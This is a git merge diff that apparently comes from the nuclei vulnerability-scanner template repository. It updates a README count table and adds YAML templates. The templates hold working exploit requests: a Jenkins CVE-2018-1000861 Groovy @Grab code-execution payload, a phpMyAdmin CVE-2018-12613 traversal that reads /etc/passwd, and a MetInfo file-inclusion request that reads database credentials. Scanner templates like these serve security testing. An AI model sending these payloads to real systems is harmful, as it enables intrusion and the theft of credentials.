Merge branch 'master' into sftp-credentials-exposure
commit
698167e7c3
|
@ -37,13 +37,10 @@ An overview of the nuclei template directory including number of templates assoc
|
|||
|
||||
| Templates | Counts | Templates | Counts | Templates | Counts |
|
||||
| -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ |
|
||||
| cves | 198 | vulnerabilities | 91 | exposed-panels | 74 |
|
||||
| exposures | 48 | technologies | 46 | misconfiguration | 43 |
|
||||
| workflows | 21 | miscellaneous | 12 | default-logins | 10 |
|
||||
| exposed-tokens | 9 | dns | 6 | fuzzing | 4 |
|
||||
| helpers | 2 | takeovers | 1 | - | - |
|
||||
|
||||
**61 directories, 574 files**.
|
||||
|
||||
</td>
|
||||
</tr>
|
||||
|
|
|
@ -0,0 +1,25 @@
|
|||
id: CVE-2018-1000861
|
||||
|
||||
info:
|
||||
name: Jenkins 2.138 Remote Command Execution
|
||||
author: dhiyaneshDK & @pikpikcu
|
||||
severity: critical
|
||||
reference: https://github.com/vulhub/vulhub/tree/master/jenkins/CVE-2018-1000861
|
||||
tags: cve,cve2018,jenkin,rce
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(name=%27test%27,%20root=%27http://aaa%27)%0a@Grab(group=%27package%27,%20module=%27vulntest%27,%20version=%271%27)%0aimport%20Payload;'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- "package#vulntest"
|
||||
part: body
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,25 @@
|
|||
id: CVE-2018-12613
|
||||
|
||||
info:
|
||||
name: PhpMyAdmin 4.8.1 Remote File Inclusion
|
||||
author: pikpikcu
|
||||
severity: critical
|
||||
reference: https://github.com/vulhub/vulhub/tree/master/phpmyadmin/CVE-2018-12613
|
||||
tags: cve,cve2018,phpmyadmin,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:[x*]:0:0"
|
||||
part: body
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -19,6 +19,7 @@ requests:
|
|||
- "{{BaseURL}}/pinfo.php"
|
||||
- "{{BaseURL}}/phpversion.php"
|
||||
- "{{BaseURL}}/time.php"
|
||||
- "{{BaseURL}}/index.php"
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
|
|
|
@ -0,0 +1,26 @@
|
|||
id: metinfo-lfi
|
||||
info:
|
||||
name: MetInfo 6.0.0/6.1.0 LFI
|
||||
author: pikpikcu
|
||||
severity: high
|
||||
reference: https://paper.seebug.org/676/
|
||||
tags: metinfo,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/include/thumb.php?dir=http/.....///.....///config/config_db.php'
|
||||
- '{{BaseURL}}/include/thumb.php?dir=.....///http/.....///config/config_db.php'
|
||||
- '{{BaseURL}}/include/thumb.php?dir=http\\..\\..\\config\\config_db.php'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "con_db_pass"
|
||||
- "con_db_name"
|
||||
part: body
|
||||
condition: and
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
Loading…
Reference in New Issue